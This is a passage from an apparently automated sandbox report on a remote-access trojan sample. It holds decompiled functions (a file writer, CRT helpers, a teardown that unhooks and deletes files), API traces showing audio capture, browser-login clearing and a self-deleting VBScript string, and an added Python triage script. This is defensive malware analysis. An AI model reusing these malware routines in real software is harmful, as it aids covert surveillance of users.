                    				return _t28 | 0xffffffff;
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
                    • Instruction ID: 37b720f5fa566b04eb8b91d50ddec810e25e564474e346c9e4a195dad27afc22
                    • Opcode Fuzzy Hash: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
                    • Instruction Fuzzy Hash: 0341F536A002049FCB10CFB8C984A5EBBB9EF88714F124569E905EB341E731FD01DB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
                    • Instruction ID: f44f3642cdb3200b4d66470b3fc96812a0cc5a4b7e600cbe4d0621a0c6eb3eb9
                    • Opcode Fuzzy Hash: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
                    • Instruction Fuzzy Hash: 9A41D136E00200DBDB20DF78D881A5EB3B5EF89714F1545AEE615EB351EB35AD01CB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A), ref: 004493F9
                    • __alloca_probe_16.LIBCMT ref: 00449431
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?), ref: 00449482
                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?,00000002,?), ref: 00449494
                    • __freea.LIBCMT ref: 0044949D
                      • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                    • String ID:
                    • API String ID: 313313983-0
                    • Opcode ID: cce82c534eee8c0eed9136d7476892f93b41b1e858a0b671dc24d243c078f96e
                    • Instruction ID: e49a694d908820c5dcacf8e8a5bbec85b76551c47cbf7292b4779bafd8218c50
                    • Opcode Fuzzy Hash: cce82c534eee8c0eed9136d7476892f93b41b1e858a0b671dc24d243c078f96e
                    • Instruction Fuzzy Hash: 1231ED72A0020AABEF249F65DC41DAF7BA5EF00714F04412AFC08D7291E739DD52DBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • [Info], xrefs: 0040A61B
                    • [Cleared browsers logins and cookies.], xrefs: 0040A5FB
                    • Cleared browsers logins and cookies., xrefs: 0040A60C
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
                    • API String ID: 3472027048-899236412
                    • Opcode ID: f19a15edf60fda488c37348f0fc0db5a19c500daee504fa477397d3b1e9aa14c
                    • Instruction ID: 6d279061f464f32cb3b26c385cb9bb5b4933cac79da48b767b21b0c9aa47c76d
                    • Opcode Fuzzy Hash: f19a15edf60fda488c37348f0fc0db5a19c500daee504fa477397d3b1e9aa14c
                    • Instruction Fuzzy Hash: 8B31B0002483817ECA1167B518267EB6B921E53348F09447FF8D42B3D3DABA482C93AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BDD
                    • waveInOpen.WINMM(0046BAB0,000000FF,0046BA98,Function_00001CEF,00000000,00000000,00000024), ref: 00401C73
                    • waveInPrepareHeader.WINMM(0046BA78,00000020), ref: 00401CC7
                    • waveInAddBuffer.WINMM(0046BA78,00000020), ref: 00401CD6
                    • waveInStart.WINMM ref: 00401CE2
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                    • String ID:
                    • API String ID: 1356121797-0
                    • Opcode ID: 57c034572b2ed406b040fceb85c2c84b668c055f7913579716275a8f10a8750c
                    • Instruction ID: 2b1c6c3e797ec0a8f4e77f87a8aae8cb50084cbbd1b388b0679906e1f0d720f4
                    • Opcode Fuzzy Hash: 57c034572b2ed406b040fceb85c2c84b668c055f7913579716275a8f10a8750c
                    • Instruction Fuzzy Hash: 4F218E316143019BC714AFE6EC4592A7BA5EB44315700403FF505D6AB1FBB844809B9E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			// Write-to-file helper (__fastcall: ecx = buffer, edx = byte count; _a4 = path, _a8 = mode).
                    			// Mode 0 overwrites (GENERIC_WRITE 0x40000000 + CREATE_ALWAYS 2); mode 1 appends
                    			// (FILE_APPEND_DATA 4 + OPEN_ALWAYS 4, then a seek to FILE_END 2); any other mode value is
                    			// passed through unchanged as both the access mask and the creation disposition. 0x80 is
                    			// FILE_ATTRIBUTE_NORMAL. Returns 1 only when WriteFile reports success, otherwise 0; the
                    			// byte count actually written (_v12) is never compared with the requested length.
                    			// The 0x00400000 copy of this function (same Opcode ID, listed below) is recorded with the
                    			// string fso.DeleteFile(Wscript.ScriptFullName) in its call context, which suggests a
                    			// caller uses it to drop a self-deleting VBScript.
                    			E105A87B5(void* __ecx, long __edx, WCHAR* _a4, long _a8) {
                    				void* _v8;                    // buffer to write (arrives in ecx)
                    				long _v12;                    // bytes written, filled in by WriteFile
                    				long _t10;
                    				long _t11;                    // dwDesiredAccess
                    				struct _OVERLAPPED* _t16;
                    				struct _OVERLAPPED* _t21;     // zero; reused as the 0/1 result
                    				long _t24;                    // dwCreationDisposition
                    				long _t27;                    // byte count (arrives in edx)
                    				void* _t30;                   // file handle
                    
                    				_push(__ecx);                 // reserve the two locals
                    				_push(__ecx);
                    				_t21 = 0;
                    				_v8 = __ecx;
                    				_t27 = __edx;
                    				_t10 = _a8;
                    				if(_t10 == 0) {               // mode 0: create or truncate
                    					_t11 = 0x40000000;        // GENERIC_WRITE
                    					_t24 = 2;                 // CREATE_ALWAYS
                    				} else {
                    					if(_t10 != 1) {           // any other mode: raw value used for both parameters
                    						_t11 = _a8;
                    						_t24 = _a8;
                    					} else {                  // mode 1: append
                    						_t11 = 4;             // FILE_APPEND_DATA
                    						_t24 = _t11;          // OPEN_ALWAYS
                    					}
                    				}
                    				_t30 = CreateFileW(_a4, _t11, _t21, _t21, _t24, 0x80, _t21);   // no sharing, FILE_ATTRIBUTE_NORMAL
                    				if(_t30 != 0xffffffff) {                                       // INVALID_HANDLE_VALUE
                    					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {   // append mode: seek to FILE_END
                    						if(WriteFile(_t30, _v8, _t27,  &_v12, _t21) != 0) {
                    							_t21 = 1;         // success
                    						}
                    						CloseHandle(_t30);
                    						_t16 = _t21;
                    						goto L13;
                    					} else {
                    						CloseHandle(_t30);    // seek failed
                    						goto L6;
                    					}
                    				} else {
                    					L6:
                    					_t16 = 0;
                    					L13:
                    					return _t16;
                    				}
                    			}

                    (per-line address map for E105A87B5: 0x105a87b8 to 0x105a8849; entries of 0x00000000 are decompiled lines with no code address)

                    APIs
                    • CreateFileW.KERNEL32(10596BD7,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,105A88DF,00000000,00000000), ref: 105A87F4
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,105A88DF,00000000,00000000,00000000,00000004), ref: 105A8810
                    • CloseHandle.KERNEL32(00000000,?,105A88DF,00000000,00000000,00000000,00000004), ref: 105A881C
                    • WriteFile.KERNEL32(00000000,00000000,00000000,10596BD7,00000000,?,105A88DF,00000000,00000000,00000000,00000004), ref: 105A882E
                    • CloseHandle.KERNEL32(00000000,?,105A88DF,00000000,00000000,00000000,00000004), ref: 105A883B
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreatePointerWrite
                    • String ID:
                    • API String ID: 1852769593-0
                    • Opcode ID: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
                    • Instruction ID: 043118d7dbb1f0232ee8d554044268d68aeb2412bb882560c6f38feefbb4c383
                    • Opcode Fuzzy Hash: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
                    • Instruction Fuzzy Hash: 5A11CE71200119FFEB044F649C89EBF7BACEB063B6F208665FA14D6180DA75CE00DA74
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179A2
                    • CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179AE
                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179C0
                    • CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179CD
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreatePointerWrite
                    • String ID:
                    • API String ID: 1852769593-0
                    • Opcode ID: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
                    • Instruction ID: 60abe95f3f53f8d2d0590be13cf87a5088bcec8eb26bc593558798ef6058d585
                    • Opcode Fuzzy Hash: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
                    • Instruction Fuzzy Hash: 8F11E0B1214118BFFB104F649C89EFB777CEB063B2F104266F915D6280C6749E888A68
                    Uniqueness

                    Uniqueness Score: -1.00%
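
                    The CreateFileW/WriteFile helper directly above occurs twice with the same Opcode ID (383baa84…) but different Instruction IDs, once in the 0x10590000 dump and once in the 0x00400000 dump, and the same pairing recurs for several _free and GetLastError entries in this part of the report. The Python below is an added example, not code from the report or from the sandbox vendor's tooling: it parses entries in the flattened layout seen on this page (an assumed format, not a documented export), pairs identical Opcode IDs across dumps, measures the address shift between the two copies from their API call sites, and tags coarse capabilities from each entry's API list. The capability labels are this example's own shorthand, and the sample input is constructed from four entries on this page with their argument lists abridged.

```python
"""Triage the flattened function entries of this sandbox report: pair the same code
across memory dumps by Opcode ID, measure the shift between the copies, and tag coarse
capabilities from each entry's API list. Added example, not code from the report or its
vendor; the line layout it parses is an assumption taken from this page."""
import re
from collections import defaultdict

API_RE = re.compile(r"^\s*•\s*(\w+)\.(\w+)(?:\((.*)\),)?\s*ref:\s*([0-9A-Fa-f]{8})\s*$")
BASE_RE = re.compile(r"Source File:.*?,\s*Offset:\s*([0-9A-Fa-f]+)")
OPCODE_RE = re.compile(r"^\s*•\s*Opcode ID:\s*([0-9a-f]{64})")

# Constructed input: four entries abridged from this page (argument lists shortened to "...").
SAMPLE_REPORT = """\
• CreateFileW.KERNEL32(10596BD7,40000000,00000000,00000000,00000002,00000080,...), ref: 105A87F4
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,...), ref: 105A8810
• WriteFile.KERNEL32(00000000,00000000,00000000,10596BD7,00000000,...), ref: 105A882E
• Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
• Opcode ID: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
Uniqueness Score: -1.00%
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,...), ref: 00417986
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179A2
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000,...), ref: 004179C0
• Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
Uniqueness Score: -1.00%
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BDD
• waveInOpen.WINMM(0046BAB0,000000FF,0046BA98,Function_00001CEF,00000000,00000000,00000024), ref: 00401C73
• waveInStart.WINMM ref: 00401CE2
• Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 57c034572b2ed406b040fceb85c2c84b668c055f7913579716275a8f10a8750c
Uniqueness Score: -1.00%
• DeleteFileW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABB1
• RemoveDirectoryW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABD6
• TerminateThread.KERNEL32(0040884B,00000000,?,1059BC11), ref: 1059ABF0
• UnhookWindowsHookEx.USER32(0046C350), ref: 1059AC00
• Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
• Opcode ID: efb332bf48883709781a4720a809b868e21492ccd9fd84fc17aea0fa76bf2a2b
Uniqueness Score: -1.00%
"""

def parse_entries(text):
    """Return [{'base': int, 'opcode_id': str, 'apis': [(name, addr), ...]}, ...]."""
    entries, cur = [], {"base": 0, "opcode_id": "", "apis": []}
    for line in text.splitlines():
        if line.strip().startswith("Uniqueness Score"):   # closes one entry
            if cur["opcode_id"]:
                entries.append(cur)
            cur = {"base": 0, "opcode_id": "", "apis": []}
        elif "Part of subcall function" in line:          # a callee's call site, not this function's
            continue
        elif (m := API_RE.match(line)):
            cur["apis"].append((m.group(1), int(m.group(4), 16)))
        elif (m := BASE_RE.search(line)):
            cur["base"] = int(m.group(1), 16)
        elif (m := OPCODE_RE.match(line)):
            cur["opcode_id"] = m.group(1)
    if cur["opcode_id"]:
        entries.append(cur)
    return entries

def by_opcode(entries):
    groups = defaultdict(list)
    for e in entries:
        groups[e["opcode_id"]].append(e)
    return groups

def shared_functions(entries):
    """Opcode IDs present in more than one dump: the same code sitting at two bases."""
    return {oid: sorted({e["base"] for e in es})
            for oid, es in by_opcode(entries).items() if len({e["base"] for e in es}) > 1}

def relocation_deltas(entries):
    """Per shared function: distinct (higher-base ref - lower-base ref) over its API call
    sites. One value for every function means the two copies differ by a uniform shift."""
    out = {}
    for oid, es in by_opcode(entries).items():
        per_base = {e["base"]: e for e in es}
        if len(per_base) < 2:
            continue
        lo, hi = (per_base[b] for b in sorted(per_base)[:2])
        if not lo["apis"] or [n for n, _ in lo["apis"]] != [n for n, _ in hi["apis"]]:
            continue                                       # call sequences differ, no 1:1 pairing
        out[oid] = sorted({h - l for (_, l), (_, h) in zip(lo["apis"], hi["apis"])})
    return out

# Labels are this example's own shorthand, not classifications taken from the report.
CAPABILITY_RULES = {
    "audio capture": {"waveInOpen", "waveInStart"},
    "file write helper": {"CreateFileW", "WriteFile"},
    "hook removal plus file/directory cleanup": {"UnhookWindowsHookEx", "DeleteFileW", "RemoveDirectoryW"},
}

def capabilities(entry):
    names = {n for n, _ in entry["apis"]}
    return sorted(tag for tag, need in CAPABILITY_RULES.items() if need <= names)

if __name__ == "__main__":
    ents = parse_entries(SAMPLE_REPORT)
    print("shared:", shared_functions(ents))
    print("deltas:", {k[:8]: [hex(d) for d in v] for k, v in relocation_deltas(ents).items()})
    print("tags:", {f"{e['base']:08X}:{e['opcode_id'][:8]}": capabilities(e) for e in ents})
```

                    On the sample the two copies of the file helper differ by a single delta of 0x10190E6E at all three call sites. That is the difference of the two dump bases (0x10190000) plus 0xE6E, so the 0x10590000 region is not simply the same image mapped at another base; together with the absolute 0x0046xxxx data references visible in the 0x10590000 decompiles in this section, that is the kind of detail worth recording before choosing which dump to treat as the canonical unpacked payload.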

                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 004475E3
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447606
                      • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044762C
                    • _free.LIBCMT ref: 0044763F
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044764E
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    • Opcode ID: ff0ef2b5bd68759a5bb2af28ad7db221fac1a14d15d758b7e8a29f0401de12d4
                    • Instruction ID: f196bec27739b8aa23800adfafa3dc4af21a9600f240203cb0157e91f0545353
                    • Opcode Fuzzy Hash: ff0ef2b5bd68759a5bb2af28ad7db221fac1a14d15d758b7e8a29f0401de12d4
                    • Instruction Fuzzy Hash: D701B1B2605B117B77211ABA5C88C7B6A6EDAC6BB6716012AB904C3241DF698D0381BC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			// CRT runtime helper rather than RAT logic: returns the calling thread's CRT data block,
                    			// allocating and registering one on first use, and preserves the caller's last-error
                    			// value across the allocation. The shape (slot index compared with -1, calloc of 0x364
                    			// bytes, store into the slot, initialise, free of the temporary) is consistent with the
                    			// MSVC CRT's _getptd_noexit. Note that the absolute data references (*0x46a1e0, 0x46b654)
                    			// point into the 0x00400000 image although this copy sits at 0x10590000.
                    			E105D2BD4(void* __ecx) {
                    				void* __esi;
                    				intOrPtr _t2;
                    				void* _t4;
                    				void* _t10;
                    				void* _t11;
                    				void* _t13;
                    				void* _t15;
                    				long _t16;
                    
                    				_t11 = __ecx;
                    				_t16 = GetLastError();                     // saved here, restored on every exit path
                    				_t10 = 0;
                    				_t2 =  *0x46a1e0;                          // thread-storage slot index; -1 means none allocated
                    				_t19 = _t2 - 0xffffffff;
                    				if(_t2 == 0xffffffff) {
                    					L2:
                    					_t15 = E105D01B6(_t11, 1, 0x364);      // calloc(1, 0x364): fresh per-thread block
                    					_pop(_t13);
                    					if(_t15 != 0) {
                    						_t4 = E105D314D(_t13, _t16, __eflags,  *0x46a1e0, _t15);   // store the block in the slot
                    						__eflags = _t4;
                    						if(_t4 != 0) {
                    							E105D29C2(_t13, _t15, 0x46b654);   // initialise the block
                    							E105D1063(_t10);                   // free(NULL): no-op
                    							__eflags = _t15;
                    							if(_t15 != 0) {
                    								goto L9;
                    							} else {
                    								goto L8;
                    							}
                    						} else {
                    							_push(_t15);                       // store failed: release the block
                    							goto L4;
                    						}
                    					} else {
                    						_push(_t10);
                    						L4:
                    						E105D1063();                           // free
                    						L8:
                    						SetLastError(_t16);
                    					}
                    				} else {
                    					_t15 = E105D30F7(_t11, _t16, _t19, _t2);   // read the slot for this thread
                    					if(_t15 != 0) {
                    						L9:
                    						SetLastError(_t16);
                    						_t10 = _t15;
                    					} else {
                    						goto L2;                                // slot exists but is empty on this thread
                    					}
                    				}
                    				return _t10;
                    			}

                    (per-line address map for E105D2BD4: 0x105d2bd4 to 0x105d2c58; entries of 0x00000000 are decompiled lines with no code address)

                    APIs
                    • GetLastError.KERNEL32(?,?,?,105CB377,105D083D,?,?,105C00B2,?,?,10592504,?,?,?,?,?), ref: 105D2BD9
                    • _free.LIBCMT ref: 105D2C0E
                    • _free.LIBCMT ref: 105D2C35
                    • SetLastError.KERNEL32(00000000), ref: 105D2C42
                    • SetLastError.KERNEL32(00000000), ref: 105D2C4B
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: 7ee369afd479ac2837c5f3bf368578fc49785976bc25547c1a3d24fbc6c937a0
                    • Instruction ID: 9c06a477d8f376d8088a65f3029cd0e412ea451d992209cdb9e61b601d238916
                    • Opcode Fuzzy Hash: 7ee369afd479ac2837c5f3bf368578fc49785976bc25547c1a3d24fbc6c937a0
                    • Instruction Fuzzy Hash: 2F01D63A155B4277D202562D5D89D0F3E2DEBE19F27210027F415A23A1EF60DD025366
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLastError.KERNEL32(?,00000000,00000000,004368F8,00000000,?,?,0043697C,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00441D6B
                    • _free.LIBCMT ref: 00441DA0
                    • _free.LIBCMT ref: 00441DC7
                    • SetLastError.KERNEL32(00000000), ref: 00441DD4
                    • SetLastError.KERNEL32(00000000), ref: 00441DDD
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: 5e542beba79a8bf6764b15491aefcaaf73a6759a21e196224635428f5f1622e9
                    • Instruction ID: 518b8b7a10e8b52fdd41fbed7a824b68d6ac3c55cbd30764ca1a8d4e20b8b852
                    • Opcode Fuzzy Hash: 5e542beba79a8bf6764b15491aefcaaf73a6759a21e196224635428f5f1622e9
                    • Instruction Fuzzy Hash: 4601D6F6941B016BB20267669C45D5B1629AFC17B6B20013FF905A22A2FEACD952412E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			// CRT locale cleanup rather than RAT logic: releases five string fields of a locale
                    			// record (offsets 0, 4, 8, 0x30, 0x34) unless each still points at the CRT's static
                    			// default kept at 0x46a188, 0x46a18c, 0x46a190, 0x46a1b8 and 0x46a1bc. The offsets match
                    			// struct lconv (decimal_point, thousands_sep, grouping, _W_decimal_point,
                    			// _W_thousands_sep), which is consistent with the CRT's __free_lconv_num with E105D1063
                    			// as free(). As in the other 0x10590000 functions, the data references are absolute
                    			// 0x0046xxxx addresses.
                    			E105D9AAA(intOrPtr* _a4) {
                    				intOrPtr _t6;
                    				intOrPtr* _t21;
                    
                    				_t21 = _a4;                                        // locale record
                    				if(_t21 != 0) {
                    					_t7 =  *_t21;                                  // decimal_point
                    					if( *_t21 !=  *0x46a188) {                     // not the static default: free it
                    						E105D1063(_t7);
                    					}
                    					_t8 =  *((intOrPtr*)(_t21 + 4));               // thousands_sep
                    					if( *((intOrPtr*)(_t21 + 4)) !=  *0x46a18c) {
                    						E105D1063(_t8);
                    					}
                    					_t9 =  *((intOrPtr*)(_t21 + 8));               // grouping
                    					if( *((intOrPtr*)(_t21 + 8)) !=  *0x46a190) {
                    						E105D1063(_t9);
                    					}
                    					_t10 =  *((intOrPtr*)(_t21 + 0x30));           // _W_decimal_point
                    					if( *((intOrPtr*)(_t21 + 0x30)) !=  *0x46a1b8) {
                    						E105D1063(_t10);
                    					}
                    					_t6 =  *((intOrPtr*)(_t21 + 0x34));            // _W_thousands_sep
                    					if(_t6 !=  *0x46a1bc) {
                    						return E105D1063(_t6);
                    					}
                    				}
                    				return _t6;
                    			}

                    (per-line address map for E105D9AAA: 0x105d9ab0 to 0x105d9b12; entries of 0x00000000 are decompiled lines with no code address)

                    APIs
                    • _free.LIBCMT ref: 105D9AC2
                      • Part of subcall function 105D1063: HeapFree.KERNEL32(00000000,00000000,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?), ref: 105D1079
                      • Part of subcall function 105D1063: GetLastError.KERNEL32(?,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?,?), ref: 105D108B
                    • _free.LIBCMT ref: 105D9AD4
                    • _free.LIBCMT ref: 105D9AE6
                    • _free.LIBCMT ref: 105D9AF8
                    • _free.LIBCMT ref: 105D9B0A
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: d0858e0bda40bbe61697d45bdd733b3d4e7997c6a727f8cefd42c9bf3d4b2659
                    • Instruction ID: c001108473c20bb9398e509e48d737942de6a702c06e02b4958346f5951424ae
                    • Opcode Fuzzy Hash: d0858e0bda40bbe61697d45bdd733b3d4e7997c6a727f8cefd42c9bf3d4b2659
                    • Instruction Fuzzy Hash: 08F0FF325047406B8650EB5DE8C9C567BEEEA41B50764481BF058EB740DA70FC908BDA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			// Teardown routine: clears a run flag at 0x46c399, terminates two worker threads,
                    			// removes the Windows hook whose handle is kept at 0x46c350, deletes the file whose
                    			// path E10592D59 builds from 0x46c3b0 and, if E10598352 agrees, removes the directory
                    			// built from 0x46c3c8. Notes on the decompile: the first TerminateThread argument is
                    			// rendered as the constants 0x40884b and 0x408830 (addresses inside the 0x00400000
                    			// image) and the report's API list records the same values; the DeleteFileW call is
                    			// shown twice but is most likely a single call whose result is normalised to 0/1 in
                    			// _t15; and the DeleteFileW/RemoveDirectoryW code at 0x1059aba4 to 0x1059abe0 sits
                    			// before the listed entry point 0x1059abe1 (compare the ref addresses below).
                    			E1059ABE1() {
                    				signed int _t15;
                    
                    				 *0x46c399 = 0;                                     // clear the run flag
                    				TerminateThread(0x40884b, 0);                       // stop worker thread 1
                    				if( *0x46c350 != 0) {                               // hook installed?
                    					__eax = UnhookWindowsHookEx(__eax);             // remove the hook kept at 0x46c350
                    					 *0x46c350 = 0;
                    					__eax = TerminateThread(0x408830, 0);           // stop worker thread 2
                    				}
                    				_pop(0);
                    				_push(0);
                    				_t25 = DeleteFileW(E10592D59(0x46c3b0));            // delete the file built from 0x46c3b0
                    				_t15 = 0 | DeleteFileW(E10592D59(0x46c3b0)) != 0x00000000;   // _t15 = (delete succeeded)
                    				if(E10598352(_t25) != 0) {
                    					RemoveDirectoryW(E10592D59(0x46c3c8));          // then remove the directory built from 0x46c3c8
                    				}
                    				return _t15;
                    			}

                    (per-line address map for E1059ABE1: 0x1059abea to 0x1059ac1d for the listed body, plus 0x1059aba4 to 0x1059abe0 for the DeleteFileW/RemoveDirectoryW block the decompiler folded into it)

                    APIs
                    • DeleteFileW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABB1
                    • RemoveDirectoryW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABD6
                    • TerminateThread.KERNEL32(0040884B,00000000,?,1059BC11), ref: 1059ABF0
                    • UnhookWindowsHookEx.USER32(0046C350), ref: 1059AC00
                    • TerminateThread.KERNEL32(00408830,00000000,?,1059BC11), ref: 1059AC12
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: TerminateThread$DeleteDirectoryFileHookRemoveUnhookWindows
                    • String ID:
                    • API String ID: 1060769190-0
                    • Opcode ID: efb332bf48883709781a4720a809b868e21492ccd9fd84fc17aea0fa76bf2a2b
                    • Instruction ID: a563ffc4adb00689aa36758b58d05a1214463fd5b90d2dfe4927b121e06babe7
                    • Opcode Fuzzy Hash: efb332bf48883709781a4720a809b868e21492ccd9fd84fc17aea0fa76bf2a2b
                    • Instruction Fuzzy Hash: F6F0C2762007409FD7009F709C889B77B9DEA04287344847EF88393261DB78DD49C6A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _free.LIBCMT ref: 00448C54
                      • Part of subcall function 004401F5: HeapFree.KERNEL32(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                      • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
